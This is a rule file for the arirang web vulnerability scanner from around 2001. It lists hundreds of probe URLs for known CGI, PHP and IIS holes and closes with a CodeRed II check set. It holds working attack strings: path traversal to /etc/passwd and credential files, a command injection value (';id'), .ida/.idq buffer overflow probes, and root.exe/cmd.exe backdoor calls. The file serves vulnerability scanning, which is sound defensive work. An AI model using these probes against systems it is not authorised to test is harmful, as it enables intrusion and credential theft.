OK-> GET :/server-info/^apache mod_info;; 200 OK-> GET :/server-status/^apache mod_status;; 200 OK-> GET :/php3/^/php3/;; 200 OK-> GET :/php/^/php/;; 200 OK-> GET :/php4/^/php4/;; 200 OK-> GET :/pds/^/pds/;; 200 OK-> GET :/inc/^/inc/;; 200 OK-> GET :/include/inc/^/include/inc/;; 200 OK-> GET :/private/^/private/;; 200 OK-> GET :/private/.htpasswd^/private/.htpasswd;; 200 OK-> GET :/public/^/public/;; 200 OK-> GET :/girls/^/girls/;; 200 OK-> GET :/girl/^/girl/;; 200 OK-> GET :/secret/^/secret/;; 200 OK-> GET :/secrets/^secrets/;; 200 OK-> GET :/files/^/files/;; 200 OK-> GET :/file/^/file/;; 200 OK-> GET :/forum/^/forum/;; 200 OK-> GET :/dbase/^/dbase/;; 200 OK-> GET :/sql/^/sql/;; 200 OK-> GET :/mysql/^/mysql/;; 200 OK-> GET :/msql/^/msql/;; 200 OK-> GET :/source/^/source/;; 200 OK-> GET :/sources/^/sources/;; 200 OK-> GET :/test/^/test/;; 200 OK-> GET :/config/^/config/;; 200 OK-> GET :/setting/^/setting/;; 200 OK-> GET :/set/^/set/;; 200 OK-> GET :/hire/^/hire/;; 200 OK-> GET :/customer/^/customer/;; 200 OK-> GET :/card/^/card/;; 200 OK-> GET :/number/^/number/;; 200 OK-> GET :/telephone/^/telephone/;; 200 OK-> GET :/phone/^/phone/;; 200 OK-> GET :/ideas/^/ideas/;; 200 OK-> GET :/idea/^/idea/;; 200 OK-> GET :/linux/^/linux/;; 200 OK-> GET :/library/^/library/;; 200 OK-> GET :/lib/^/lib/;; 200 OK-> GET :/tool/^/tool/;; 200 OK-> GET :/tools/^/tools/;; 200 OK-> GET :/document/^/document/;; 200 OK-> GET :/documents/^/documents/;; 200 OK-> GET :/setup/^/setup/;; 200 OK-> GET :/install/^/install/;; 200 OK-> GET :/program/^/program/;; 200 OK-> GET :/programming/^/programming/;; 200 OK-> GET :/devel/^/devel/;; 200 OK-> GET :/database/^/database/;; 200 OK-> GET :/databases/^/databases/;; 200 OK-> GET :/accept/^/accept/;; 200 OK-> GET :/deny/^/deny/;; 200 OK-> GET :/ports/^/ports/;; 200 OK-> GET :/temp/^/temp/;; 200 OK-> GET :/temporary/^temporary;; #snort 200 OK-> GET :/snort2html.html^snort(/snort2html) log;; 200 OK-> GET :/html/snort2html.html^snort(/html/snort2html) log;; 200 OK-> GET :/acid/acid_main.php^snort(/acid/acid_main.php);; 200 OK-> GET :/acid/^snort(/acid);; #mrtg & snmp 200 OK-> GET :/mrtg/^MRTG(/mrtg/);; 200 OK-> GET :/snmp/^SNMP(/snmp/);; 200 OK-> GET :/usage/^/usage/;; #log 200 OK-> GET :/Stats/^/Stats/;; 200 OK-> GET :/cache-stats/^/cache-stats/;; 200 OK-> GET :/log/^/log/;; 200 OK-> GET :/logfile/^/logfile/;; 200 OK-> GET :/logfiles/^/logfiles/;; 200 OK-> GET :/logger/^/logger/;; 200 OK-> GET :/logging/^/logging/;; 200 OK-> GET :/logs/^/logs/;; 200 OK-> GET :/logs/access_log^/logs/access_log;; 200 OK-> GET :/server_stats/^/lserver_stat/;; 200 OK-> GET :/stat/^/stat/;; 200 OK-> GET :/statistics/^/statistics/;; 200 OK-> GET :/stats/^/stats/;; 200 OK-> GET :/weblog/^/weblog/;; 200 OK-> GET :/weblogs/^/weblogs/;; 200 OK-> GET :/webstats/^/webstats/;; 200 OK-> GET :/wstats/^/wstats/;; 200 OK-> GET :/wwwlog/^/wwwlog/;; 200 OK-> GET :/wwwstats/^/wwwstats/;; 200 OK-> GET :/access-log^/access-log;; 200 OK-> GET :/access.log^/access.log;; 200 OK-> GET :/log.htm^/log.htm;; 200 OK-> GET :/log.html^/log.html;; 200 OK-> GET :/log.txt^/log.txt;; 200 OK-> GET :/logfile^/logfile;; 200 OK-> GET :/logfile.htm^/logfile.htm;; 200 OK-> GET :/logfile.html^/logifle.html;; 200 OK-> GET :/logfile.txt^/logfile.txt;; 200 OK-> GET :/logger.html^/logger.html;; 200 OK-> GET :/stat.htm^/stat.htm;; 200 OK-> GET :/stats.htm^/stats.htm;; 200 OK-> GET :/stats.html^/stats.html;; 200 OK-> GET :/stats.txt^/stats.txt;; 200 OK-> GET :/webaccess.htm^/webaccess.htm;; 200 OK-> GET :/wwwstats.html^/wwwstats.html;; #end log 200 OK-> GET :/site/eg/source.asp^apache::asp (source.asp);; 200 OK-> GET :/cgi-bin-sdb^Suse <=6.4 (/cgi-bin-sdb);; 200 OK-> GET :/secret/secret/add-user.shmtl^Suse (add-user.shtml);; 200 OK-> GET :/secret/secret/sql_tool.shtml^Suse (sql_tool.shtml) ;; 200 OK-> GET :/secret/secret/change-passwd.shtml^Suse (change-passwd.shtml);; 200 OK-> GET :/phpPhotoAlbum/explorer.php^phpPhotoAlbum 0.99 (explorer.php);; 200 OK-> GET :/perl^Mandrake <=7.1 (/perl);; 200 OK-> GET :/cgi-bin/mailto.cgi^Johnson (mailto.cgi);; 200 OK-> GET :/search97cgi/vtopic^SCO Unixware7.0 (/search97cgi/vtopic);; 200 OK-> GET :/cgi-bin/YaBB.pl^YaBB File read(YABB.pl);; 200 OK-> GET :/cgi-bin/mailform.pl^MailForm 2.0 (mailform.pl);; 200 OK-> GET :/Newuser?Image=../../database/rbsserv.mdb^Extent RBS (rbsserv.mdb);; 200 OK-> GET :/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml^Talentsoft Web+ (webplus.cgi) ;; 200 OK-> GET :/cgi-bin/webdata.cgi^WebTeacher WebData(webdata.cgi);; 200 OK-> GET :/cgi-bin/cached_feed.cgi^Moreover (cached_feed.cgi);; 200 OK-> GET :/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd^Boa Webserver 0.94.2.x;; 200 OK-> GET :/cgi-bin/mailfile.cgi^MailFile (mailfile.cgi);; 200 OK-> GET ://WEB-INF/^Allaire JRun 3.0 Dic (//Web-INF/) ;; 200 OK-> GET :/servlet/com.livesoftware.jrun.plugins.jsp.JSP^Allaire JRun 2.3 multiple (servlet) A;; 200 OK-> GET :/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter^Allaire JRun 2.3 multiple (servlet) B;; 200 OK-> GET :/exec/show/config/cr^Cisco Catalyst3500(/exec/show/config/cr);; 200 OK-> GET :/cgi-bin/global.cgi^*BSD Global Port (global.cgi) ;; 200 OK-> GET :/cgi-bin/pagelog.cgi^Pagelog (pagelog.cgi);; 200 OK-> GET :/cgi-bin/scripts/whois.cgi?action=load&whois=check^KW Whois (whois.cgi);; 200 OK-> GET :/servlet/com.unify.ewave.servletexec.UploadServlet^Unify eWave ServletExec;; 200 OK-> GET ::2301/survey^Compaq Management (/survey);; 200 OK-> GET :/cgi-bin/Search.pl^YaBB Search.pl (Search.pl);; 200 OK-> GET :/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id^Bill Kendrick GBook (gbook.cgi);; 200 OK-> GET :/cgi-bin/bb-hist.sh^BigBrother remote account(bb-hist.sh);; 200 OK-> GET :/cgi-bin/build.cgi^Adcycle Password (build.cgi);; 200 OK-> GET :/cgi-bin/cgiforum.pl^CGIForum File Dislosure( cgiforum.pl);; 200 OK-> GET :/forum/common.php^Phorum File Read(common.php) A;; 200 OK-> GET :/phorum/common.php^Phorum File Read(common.php) B ;; 200 OK-> GET :/index.php3?vhosts[test]=^Twig Remote Script Execution(index.php3);; 200 OK-> GET :/cgi-bin/db2www/library/document.d2w/show^IBM Net.Data Path(show);; 200 OK-> GET :/includes/global.inc^Trlinux Webmail(global.inc);; 200 OK-> GET :/submit.php?CONF=anything^phpWebLog Admin bypass(submit.php) ;; 200 OK-> GET ::8765/index.html^Inktomi Search(:8765/index.html) ;; 200 OK-> GET ::8765/example/^Inktomi Search(:8765/example/);; 200 OK-> GET :/phpgroupware/inc/phpgwapi/phpgw.inc.php^phpGroupWare Include File(phpgw.inc.php);; 200 OK-> GET :/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=^MailMan WebMail(mmstdod.cgi) ;; 200 OK-> GET :/cgi-bin/ad.cgi^Leif M.Wright (ad.cgi);; 200 OK-> GET :/cgi-bin/simplestmail.cgi^Leif M.Wright (simplestmail.cgi);; 200 OK-> GET :/cgi-bin/everythingform.cgi^Leif M.Wright (everythingform.cgi);; 200 OK-> GET :/cgi-bin/simplestguest.cgi^Leif M.Wright (simplestguest.cgi);; 200 OK-> GET :/cgi-bin/ezshopper3/loadpage.cgi^EZShooper3 dir Disclosure(loadpage.cgi)A;; 200 OK-> GET :/cgi-bin/ezshopper2/loadpage.cgi^EZshooper2 dir Disclosure(loadpage.cgi)B;; 200 OK-> GET :/.jpilot/^jpilot World Readable(/.jpilot/);; 200 OK-> GET :/subscribe.pl?test@test.com^SubscribeME Admin Access(/subscripbe.pl);; 200 OK-> GET :/WSFTP.LOG^WSFTP Log file (/WSFTP.LOG);; 200 OK-> GET :/index.html~^vim backup file(/index.html~) ;; 200 OK-> GET :/index.php~^vim backup file(/index.php~) ;; 200 OK-> GET :/index.html.bak^sambar client backup(/index.html.bak);; 200 OK-> GET :/index.php.bak^sambar client backup(/index.php.bak);; 200 OK-> GET :/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi^techonote file read(/technote/main.cgi);http://www.technote.co.kr; 200 OK-> GET :/technote/print.cgi^techonote file read(/technote/print.cgi);http://www.technote.co.kr; 200 OK-> GET :/cgi-bin/register.cgi^ikonboard(register.cgi);; 200 OK-> GET :/cgi-bin/newsdesk.cgi?t=../pass.txt^newsdesk.cgi File read(newsdesk.cgi);; 200 OK-> GET :/cgi-bin/webdriver^Webdriver remote admin(webdriver);; 200 OK-> GET :/cgi-bin/bbs_forum.cgi^eXtropia bbs_forum.cgi(bbs_forum.cgi) ;; 200 OK-> GET :/class/mysql.class^Basilix Webmail(mysql.class);; 200 OK-> GET :/inc/sendmail.inc^Basilix Webmail(sendmail.inc);; 200 OK-> GET :/setpasswd.cgi^Interscan VirusWall(/setpasswd.cgi);; 200 OK-> GET :/scancfg.cgi^Interscan VirusWall(/scancfg.cgi);; 200 OK-> GET :/cgi-bin/CrazyWWWBoard.cgi^qDecoder bof(CrazyWWWBoard.cgi);http://www.nobreak.com; 200 OK-> GET :/cgi-bin/empower?DB=UkRteamHole^Muscat Path (empower) ;; 200 OK-> GET :/cgi-bin/pals-cgi^WebPALS remote execute(pals-cgi);; 200 OK-> GET :/ROADS/cgi-bin/search.pl^Martin ROADS file disclosure(search.pl) ;; 200 OK-> GET :/way-board/way-board.cgi^Way-Board 2.0 file read(way-board.cgi);; 200 OK-> GET :/cgi-bin/replicator/webpage.cgi^WebPage.cgi(webpage.cgi) ;; 200 OK-> GET :/cgi-bin/auktion.pl^HIS Auktion 1.62(auktion.pl);; 200 OK-> GET :/opendir.php?requesturl=/etc/passwd^PHP-NUKE(opendir.php) ;; 200 OK-> GET :/cgi-bin/webspirs.cgi^WebSPIRS file disclosure(webspirs.cgi);; 200 OK-> GET :/cgi-bin/commerce.cgi?page=check^Carey Commerce.cgi(commerce.cgi);; 200 OK-> GET :/cgi-bin/store.cgi?StartID=../etc/hosts%00.html^ES.One file read(store.cgi) ;; 200 OK-> GET :/cgi-bin/ipf/etc/gfw/ui/pwd.dat^ipfilter cgi password(pwd.dat);; 200 OK-> GET :/cgi-bin/hsx.cgi^Hyperseek 2000 file read(hsx.cgi);; 200 OK-> GET :/cgi-bin/mailnews.cgi^mailnews(mailnews.cgi);; 200 OK-> GET :/cgi-bin/adcycle^adcycle;; 200 OK-> GET :/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd^chilisoft ASP(codebrws.asp);http://www.chilisoft.com; 200 OK-> GET :/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini^chilisoft ASP(codebrws.asp);http://www.chilisoft.com; 200 OK-> GET :/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server^chilisoft ASP(codebrws.asp);http://www.chilisoft.com; 200 OK-> GET :/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC^chilisoft ASP(codebrws.asp);http://www.chilisoft.com; 200 OK-> GET :/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000^chilisoft ASP(codebrws.asp);http://www.chilisoft.com; 200 OK-> GET :/user.php&op=saveuser^PHPNUKE(user.php);http://www.phpnuke.org; 200 OK-> GET :/banners.php?op=Change^PHPNUKE(banners.php);http://www.phpnuke.org; 200 OK-> GET :/cgi-bin/post-query^post-query (CGI) buffer overflow;; 200 OK-> GET :/cgi-bin/ikonboard/help.cgi^Ikonboard v2.1.7b(help.cgi);http://www.ikonboard.com; 200 OK-> GET :/cgi-bin/s.cgi?q=a&tmpl=check^Aspseek buffer overflow(s.cgi);www.aspseek.org; 200 OK-> GET ::8080/examples/jsp/num/numguess.js%70^Tomcat source(numguess.js);http://jakarta.apache.org/tomcat/; 200 OK-> GET ::8080/index.js%2570^Tomcat source(index.js%2570);http://jakarta.apache.org/tomcat/; 200 OK-> GET :/cgi-bin/anacondaclip.pl?template=check^Anaconda show file(anacondaclip.pl);http://www.anaconda.net; 200 OK-> GET :/cgi-bin/webspirs.cgi^Webspirs(webspirs.cgi);; 200 OK-> GET :/cgi-bin/ustorekeeper.pl^ustorekeeper(ustorekeeper.pl);http://www.uburst.com; 200 OK-> GET :/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0^Ultimate Bulletin Board(postings.cgi);http://www.infopop.com/business/business_ubb.html; 200 OK-> GET :/cgi-bin/processit.pl^processit.pl;; 200 OK-> GET :/cgi-bin/nph-maillist.pl^nph-maillist.pl;; 200 OK-> GET :/cgi-bin/dcboard.cgi^DCForum(dcboard.cgi);www.dcscripts.com\n\thttp://www.dcscripts.com/FAQ/sec_2001_03_31.html; 200 OK-> GET :/cgi-bin/dcadmin.cgi^DCForum(dcadmin.cgi);www.dcscripts.com\n\thttp://www.dcscripts.com/FAQ/sec_2001_03_31.html; 200 OK-> GET :/cgi-bin/dcforumlib.pl^DCForum(dcforumlib.pl);www.dcscripts.com\n\thttp://www.dcscripts.com/FAQ/sec_2001_03_31.html; 200 OK-> GET :/cgi-bin/upload_file.pl^DCForum(upload_file.pl);www.dcscripts.com\n\thttp://www.dcscripts.com/FAQ/sec_2001_03_31.html; 200 OK-> GET :/cgi-bin/cal_make.pl^PerlCal(cal_make.pl);http://www.perlcal.com; ######### end (~2001/05/25 WWW Unix Vulnerabilities ) ############################################################################################################################################## # arirang 1.6 scan rule for IIS .ida buffer overflow and check CodeRed II infected server. # codered.uxe # by pilot 2001/08/10 # thanks RYMUS,NORBERT (Non-HP-Germany,ex1) # #http://www.eeye.com/html/Research/Advisories/AD20010618.html #http://www.microsoft.com/technet/security/bulletin/MS01-033.asp # Korean people please visit http://www.hauri.co.kr # http://www.ahnlab.co.kr # # usage) # C Class) arirang -G -s 192.168.1.1 -e 192.168.1.255 -r codered2.uxe # B Class) arirang -G -s 192.168.0.1 -e 192.168.255.255 -r codered2.uxe # specfic ip address example) arirang -G -s 192.168.1.10 -e 192.168.1.20 -r codered2.uxe # one host scan) arirang -G -h 192.168.1.1 -r codered2.uxe # # Q)how do i check IIS server in our network? # example C CLASS)./arirang -G -s 192.168.1.1 -e 192.168.1.255|grep IIS ALL IDQ-> GET :/a.ida?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^server already deleted .ida , not vulnerable;; ALL IDQ-> GET :/a.idq?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^server already deleted .idq , not vulnerable;; ALL processing-> GET :/a.ida?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^IIS .ida buffer overflow found, Vulnerable;http://www.microsoft.com/technet/security/bulletin/MS01-033.asp; ALL processing query-> GET :/a.idq?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^IIS .idq buffer overflow found, Vulnerable;http://www.microsoft.com/technet/security/bulletin/MS01-033.asp; 200 OK-> GET :/c/inetpub/scripts/root.exe?/c+dir^Code Red II Worm Infected check1;remove root.exe,c:\explorer.exe then reboot server,patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp; 200 OK-> GET :/c/winnt/system32/cmd.exe?/c+dir^Code Red II Worm Infected check2; remove c:\explorer.exe ,modify cmd.exe permission only administrator then reboot server, patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp; 200 OK-> GET :/d/inetpub/scripts/root.exe?/c+dir^Code Red II Worm Infected check3;remove d:\explorer.exe,root.exe, then reboot server,patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp; 200 OK-> GET :/d/winnt/system32/cmd.exe?/c+dir^Code Red II Worm Infected check4; remove d:\explorer.exe ,modify cmd.exe permission only administrator then reboot server, patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp; 200 OK-> GET :/scripts/root.exe?/c+dir^Code Red II Worm Infected check5;remove /scripts/root.exe,c:\explorer.exe then reboot server,patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp; 200 OK-> GET :/msadc/root.exe?/c+dir^Code Red II Worm Infected check6;remove /msadc/root.exe,c:\explorer.exe then reboot server\npatch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;